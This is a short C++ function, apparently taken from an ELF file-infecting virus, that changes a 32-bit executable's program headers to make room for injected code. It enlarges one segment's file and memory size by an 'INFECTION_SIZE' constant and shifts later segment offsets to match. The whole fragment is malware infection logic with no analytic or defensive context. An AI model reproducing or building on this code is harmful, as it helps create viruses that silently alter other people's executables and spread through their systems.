bool Target::patchPhdr()
{
  phdr[2].p_filesz += INFECTION_SIZE;
  phdr[2].p_memsz += INFECTION_SIZE;

  Elf32_Phdr* entry = phdr;
  for(unsigned nr = p.ehdr->e_phnum; nr > 0; nr--, entry++)
  {
    if (entry->p_offset > top)
      entry->p_offset += INFECTION_SIZE;
  }
  return true; /* this implementations can't fail */
}
